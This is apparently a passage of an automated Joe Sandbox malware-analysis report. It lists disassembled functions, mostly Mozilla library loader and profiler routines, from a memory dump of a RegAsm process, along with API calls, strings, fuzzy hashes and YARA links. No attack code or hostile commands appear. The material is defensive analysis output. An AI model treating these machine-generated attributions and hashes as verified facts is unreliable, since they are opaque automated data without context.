                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                    • API String ID: 2491745604-3904374701
                                                                                    • Opcode ID: 73fd9d88b56f08a83830bd7a9998c36d7b76220df8db752916e1a34354465045
                                                                                    • Instruction ID: 7cf1a13b2a8ee28fa9e574f8fa439a124bc9879e4776e97dd55a881c600ce8ca
                                                                                    • Opcode Fuzzy Hash: 73fd9d88b56f08a83830bd7a9998c36d7b76220df8db752916e1a34354465045
                                                                                    • Instruction Fuzzy Hash: 3A31E5B17047149BC7009F6886442AAF7E5AFD6308F14852EE8994BB42EB71D909C7D6
                                                                                    Function 6C6FF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C6FF480
                                                                                      • Part of subcall function 6C6CF100: LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                      • Part of subcall function 6C6CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C6FF555
                                                                                      • Part of subcall function 6C6D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C6D1248,6C6D1248,?), ref: 6C6D14C9
                                                                                      • Part of subcall function 6C6D14B0: memcpy.VCRUNTIME140(?,6C6D1248,00000000,?,6C6D1248,?), ref: 6C6D14EF
                                                                                      • Part of subcall function 6C6CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C6CEEE3
                                                                                    • CreateFileW.KERNEL32 ref: 6C6FF4FD
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C6FF523
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                    • String ID: \oleacc.dll
                                                                                    • API String ID: 2595878907-3839883404
                                                                                    • Opcode ID: ec2f19bad7fb941f343cc4cbfcb39d980c98f644c32fe2de2602d1a3ac46981b
                                                                                    • Instruction ID: da559642217f06fdd298b6f3b2a6532fdb408c61e95cf8239b53726f0eba1ceb
                                                                                    • Opcode Fuzzy Hash: ec2f19bad7fb941f343cc4cbfcb39d980c98f644c32fe2de2602d1a3ac46981b
                                                                                    • Instruction Fuzzy Hash: 8741D4706087109FE721DF68C984B9BB7F5AF95318F104A2DF5A083650EB70E94ACB97
                                                                                    Function 6C70E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E047
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70E04F
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C70E09C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C70E0B0
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C70E057
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                    • API String ID: 1832963901-4276087706
                                                                                    • Opcode ID: 3700affd4717fcbc57a8e565cdfbe58f4b4f59e77eb0d8de70eac31d03206a4b
                                                                                    • Instruction ID: 5b192fe2dc159df0560be0ad694e3a734b4d75469a191dc78ba2d8b35ab8c692
                                                                                    • Opcode Fuzzy Hash: 3700affd4717fcbc57a8e565cdfbe58f4b4f59e77eb0d8de70eac31d03206a4b
                                                                                    • Instruction Fuzzy Hash: A721BEB4B011088FDF00EF64D95CAAEB7F5AF8520CF644029E95A97740DB31A909C7E1
                                                                                    Function 6C7274A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C727526
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C727566
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C727597
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                    • API String ID: 3217676052-1401603581
                                                                                    • Opcode ID: b259ba837c010338f8a8f8fdbc1a353282b36389edaee138d9e4d202ab228981
                                                                                    • Instruction ID: 1f16e0eff7dde2bd7f93b7e6424f51e4d1b3587168f203c94490749e5d9f2249
                                                                                    • Opcode Fuzzy Hash: b259ba837c010338f8a8f8fdbc1a353282b36389edaee138d9e4d202ab228981
                                                                                    • Instruction Fuzzy Hash: 7321F531700501A7DB16AFF9CF18E5A7376EB87329F45853AD81547B40D73CA902C695
                                                                                    Function 6C727930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C727A3F), ref: 6C6DBF11
                                                                                      • Part of subcall function 6C6DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C727A3F), ref: 6C6DBF5D
                                                                                      • Part of subcall function 6C6DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C727A3F), ref: 6C6DBF7E
                                                                                    • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C727968
                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C72A264,6C72A264), ref: 6C72799A
                                                                                      • Part of subcall function 6C6D9830: free.MOZGLUE(?,?,?,6C727ABE), ref: 6C6D985B
                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7279E0
                                                                                    • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7279E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                    • String ID: sl
                                                                                    • API String ID: 3421697164-3563831378
                                                                                    • Opcode ID: 8e7b5b064591e4e500259ccea1b0b5161dfd1267a31841e2c18f518812f865cb
                                                                                    • Instruction ID: 730c95b5cc0c7a7b495989e8ea747e4d9f30e4f14d805defe989d770ea79446b
                                                                                    • Opcode Fuzzy Hash: 8e7b5b064591e4e500259ccea1b0b5161dfd1267a31841e2c18f518812f865cb
                                                                                    • Instruction Fuzzy Hash: 21215C356043149FCB04DF18D899A9EBBF5FF89314F45886DE84A87361DB30A909CB96
                                                                                    Function 6C72A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74F770,-00000001,?,6C73E330,?,6C6EBDF7), ref: 6C72A7AF
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C6EBDF7), ref: 6C72A7C2
                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C6EBDF7), ref: 6C72A7E4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F770), ref: 6C72A80A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                    • String ID: accelerator.dll
                                                                                    • API String ID: 2442272132-2426294810
                                                                                    • Opcode ID: 8f5bdc27c267dc476b706d160350867a95430f6c98a102d1c7bb871ad7fea63d
                                                                                    • Instruction ID: fffbf2ab167a4adc183a2fbd1945ac4eec07745c2ec48efaa1e864562691d8db
                                                                                    • Opcode Fuzzy Hash: 8f5bdc27c267dc476b706d160350867a95430f6c98a102d1c7bb871ad7fea63d
                                                                                    • Instruction Fuzzy Hash: 3301A2716003149FEB04DFA9D984C157BF8FB8A329745C07BE9098B701DB74AC00CBA1
                                                                                    Function 6C6CF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6C6CEE51,?), ref: 6C6CF0B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C6CF0C2
                                                                                    Strings
                                                                                    • ole32, xrefs: 6C6CF0AD
                                                                                    • Could not find CoTaskMemFree, xrefs: 6C6CF0E3
                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C6CF0DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                    • API String ID: 2574300362-1578401391
                                                                                    • Opcode ID: 157c6106d2fe7d3a91ee5414906469a2b2130b1e6be02c9ea1e5b9efaac7d120
                                                                                    • Instruction ID: 2cdaf6a6d54cec227d327405dc8fa4d589c129bbe6948dade61e84a05d99a0f5
                                                                                    • Opcode Fuzzy Hash: 157c6106d2fe7d3a91ee5414906469a2b2130b1e6be02c9ea1e5b9efaac7d120
                                                                                    • Instruction Fuzzy Hash: 0CE0DF70345201DBAF04BA66A928A3A3BBCAB52A0D710C03EE512C1E00EE20E5108667
                                                                                    Function 6C7000D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7235), ref: 6C7000D8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C7000F7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7235), ref: 6C70010E
                                                                                    Strings
                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C7000F1
                                                                                    • wintrust.dll, xrefs: 6C7000D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                    • API String ID: 145871493-2559046807
                                                                                    • Opcode ID: 35fda6903d9532b42f4cf0b0ab47599d4dc62e239ddb49aa74b4ca3a4df4c221
                                                                                    • Instruction ID: b6eec9100d8cafa162c37c98c96551f830445b70eb63ec303899d578f6738493
                                                                                    • Opcode Fuzzy Hash: 35fda6903d9532b42f4cf0b0ab47599d4dc62e239ddb49aa74b4ca3a4df4c221
                                                                                    • Instruction Fuzzy Hash: 69E01AB03057059BEF00BF268A09F2A7AFCA70725CF60C037A909C5600DBB0A4108B10
                                                                                    Function 6C700080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7204), ref: 6C700088
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C7000A7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7204), ref: 6C7000BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                    • API String ID: 145871493-3385133079
                                                                                    • Opcode ID: 3e1de94f4e4f200737e86813f4f94cac94be79d75106d2967dbae78eae388b08
                                                                                    • Instruction ID: 26a49e4f15ceef0e17488821dc6e479ab86b37c0cecd360d7039175220600483
                                                                                    • Opcode Fuzzy Hash: 3e1de94f4e4f200737e86813f4f94cac94be79d75106d2967dbae78eae388b08
                                                                                    • Instruction Fuzzy Hash: BDE0EEB02007009BEB00BF678A08B057AFCA70B358F10C037AA20C6600DBB5D4409B21
                                                                                    Function 6C700170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7308), ref: 6C700178
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C700197
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7308), ref: 6C7001AE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                    • API String ID: 145871493-3354427110
                                                                                    • Opcode ID: 3f6707a5ee04e92c46fbea2de8703199de1dd1e5425d21687358cd0c5f44f4e0
                                                                                    • Instruction ID: 1a34ce12381e0aa32f2770c0181b72cffdd67b8e33bc09ccce33a57ecda85253
                                                                                    • Opcode Fuzzy Hash: 3f6707a5ee04e92c46fbea2de8703199de1dd1e5425d21687358cd0c5f44f4e0
                                                                                    • Instruction Fuzzy Hash: 81E01AB07817849BEF007F26CA08B0A7BFCB74729DF148077EA8585641DB7094508B10
                                                                                    Function 6C700120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7297), ref: 6C700128
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C700147
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7297), ref: 6C70015E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                    • API String ID: 145871493-1536241729
                                                                                    • Opcode ID: a163ac3f67d3fe888e65b4eb4db8ac5aee0b9650121699a0ecc5830d98723304
                                                                                    • Instruction ID: 8a1bdfafbd51848a5598bd433dc949cc9a11a68dbdbdcf40719c366bdb19a0f5
                                                                                    • Opcode Fuzzy Hash: a163ac3f67d3fe888e65b4eb4db8ac5aee0b9650121699a0ecc5830d98723304
                                                                                    • Instruction Fuzzy Hash: D6E0E5B06056449BEB00BF2B8908B1A7AFCA747359F50C037AA05CA600DB70D4008F50
                                                                                    Function 6C7001C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7266), ref: 6C7001C8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C7001E7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7266), ref: 6C7001FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                    • API String ID: 145871493-1489773717
                                                                                    • Opcode ID: 499d585fb8d3af389b66b0fd0cc6eda8bd9a73cae687f974544903b2c106bd0a
                                                                                    • Instruction ID: 0a93693969f847db626402a8912504c306d5f2d65d61a4500bee1f1bcf7ef61f
                                                                                    • Opcode Fuzzy Hash: 499d585fb8d3af389b66b0fd0cc6eda8bd9a73cae687f974544903b2c106bd0a
                                                                                    • Instruction Fuzzy Hash: 54E075B46847959FEB00BF678A08B1A7AFCAB57399F50C437AA15C9A41DB7494009B10
                                                                                    Function 6C72C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C72C0E9), ref: 6C72C418
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C72C437
                                                                                    • FreeLibrary.KERNEL32(?,6C72C0E9), ref: 6C72C44C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                    • API String ID: 145871493-2623246514
                                                                                    • Opcode ID: d516193b4eacb3cfbe745495b9c80b1d1e66abe5c3fce3c39bfd6e82e7cb4c44
                                                                                    • Instruction ID: b525993d3653b5cdbdb89d60d84c2714465d19d0d8b7d3dbee3d060d473dc88b
                                                                                    • Opcode Fuzzy Hash: d516193b4eacb3cfbe745495b9c80b1d1e66abe5c3fce3c39bfd6e82e7cb4c44
                                                                                    • Instruction Fuzzy Hash: 60E09270605711ABEB007FB68E08B167EFCA75A64DF00D137AA1499601EBB4D5408A50
                                                                                    Function 6C7275B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C72748B,?), ref: 6C7275B8
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7275D7
                                                                                    • FreeLibrary.KERNEL32(?,6C72748B,?), ref: 6C7275EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                    • API String ID: 145871493-3641475894
                                                                                    • Opcode ID: a99786f7161a1c0e54ae517ca9658b1c24f883ad76f376b5272c7997e4f48062
                                                                                    • Instruction ID: 1caf2a13795516fe1c4c4160694ed675f19f4686da49755786a06edf8f7f267b
                                                                                    • Opcode Fuzzy Hash: a99786f7161a1c0e54ae517ca9658b1c24f883ad76f376b5272c7997e4f48062
                                                                                    • Instruction Fuzzy Hash: DDE07E71605711ABEB027BA6CA48B09BAF8EB4625CF90D036A90591601EBB89551CF11
                                                                                    Function 6C727600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
